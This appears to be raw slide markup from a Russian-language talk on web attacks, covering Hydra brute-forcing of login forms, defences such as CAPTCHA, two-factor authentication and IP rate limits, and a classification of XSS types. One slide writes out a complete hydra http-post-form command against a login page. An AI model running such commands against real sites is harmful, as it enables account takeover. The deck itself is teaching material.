                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53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8" st="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53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9" st="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53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10" st="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53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11" st="11"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="540" name="Shape 540"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Shape 541"/>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542" name="Shape 542"/>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3" name="Shape 543"/>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Выпустить Крякена!!!</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descr="Screenshot_6.jpg" id="544" name="Shape 544"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964048" y="1126275"/>
            <a:ext cx="3641266" cy="2856725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 545"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128075" y="4290375"/>
            <a:ext cx="7805700" cy="60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ru"/>
              <a:t>$ hydra -l LoginSvyat -p 12345678 -s 80 site.ua http-post-form "/:login_name=^USER^&amp;login_password=^PASS^:Please login" -t 5 -w 30 -f</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="550" name="Shape 550"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Как подобрать пароль от аккаунта, если его забыл ;-)" id="551" name="Shape 551" title="Hydra (Brute force)">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1093000" y="30900"/>
            <a:ext cx="6777500" cy="5083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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="556" name="Shape 556"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 55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558" name="Shape 558"/>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9" name="Shape 55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Как защитится?</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sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Shape 560"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639350" y="678300"/>
            <a:ext cx="8371800" cy="2065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ru" sz="2400"/>
              <a:t>1. Добавить капчу </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>2. Добавить двухэтапную аутентификацию</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>3. Ввести лимиты на поступление запросов с одного IP </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screenshot_5.jpg" id="561" name="Shape 561"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2753050" y="2232925"/>
            <a:ext cx="5758950" cy="277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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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1" st="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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2" st="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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3" st="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="566" name="Shape 566"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 56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568" name="Shape 568"/>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9" name="Shape 56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Спасибо за внимание!</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="1456331817131371712.jpg" id="570" name="Shape 570"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375475" y="1600300"/>
            <a:ext cx="4673275" cy="3504950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Shape 571"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664600" y="1496500"/>
            <a:ext cx="4026300" cy="1274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3000"/>
              <a:t>Вопросы?</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572" name="Shape 572"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1727650" y="3139250"/>
            <a:ext cx="3853200" cy="360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                                                        svatogor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descr="Картинки по запросу facebook logo" id="573" name="Shape 573"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="470800" y="2970825"/>
            <a:ext cx="697150" cy="697150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="574" name="Shape 574"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="592075" y="3748850"/>
            <a:ext cx="454600" cy="454600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="575" name="Shape 575"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="552450" y="4440300"/>
            <a:ext cx="482666" cy="360300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Shape 576"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1015550" y="3748850"/>
            <a:ext cx="4828500" cy="360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a:t>svyat.login@gmail.com</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ru"/>
              <a:t>http://goo.gl/y3cDsU</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2.JPG" id="93" name="Shape 93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>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Что такое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id="96" name="Shape 96"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051226" y="1022525"/>
            <a:ext cx="7716807" cy="3912901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="97" name="Shape 97"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3640475" y="1034725"/>
            <a:ext cx="2865100" cy="157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2.JPG" id="102" name="Shape 102"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Shape 103"/>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Классификация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105" name="Shape 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375257" y="1077200"/>
            <a:ext cx="6520200" cy="625800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>Отраженные (Непостоянные)</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Shape 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375257" y="1595309"/>
            <a:ext cx="6520200" cy="625800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>Хранимые (Постоянные)</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Shape 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375257" y="2144297"/>
            <a:ext cx="6520200" cy="625800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="3000"/>
              <a:t>DOM-модели</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="Shape 108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3206875"/>
            <a:ext cx="2489001" cy="1555626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="Shape 109"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3251001" y="2922497"/>
            <a:ext cx="2789127" cy="2068603"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="Shape 110"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192528" y="2922497"/>
            <a:ext cx="2758138" cy="2068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2.JPG" id="115" name="Shape 115"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Shape 116"/>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sz="3000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Отраженные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pic>
        <p:nvPicPr>
          <p:cNvPr descr="lJ5AfkLBb7.jpg" id="118" name="Shape 118"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="487200" y="1232903"/>
            <a:ext cx="2730125" cy="1858447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675125" y="833500"/>
            <a:ext cx="2450100" cy="384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solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SEO менеджер</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="9585885-happy-office-worker.jpg" id="120" name="Shape 120"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757325" y="1441925"/>
            <a:ext cx="1809750" cy="1924050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6685850" y="833500"/>
            <a:ext cx="2352000" cy="42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2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Пользователь</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 122"/>
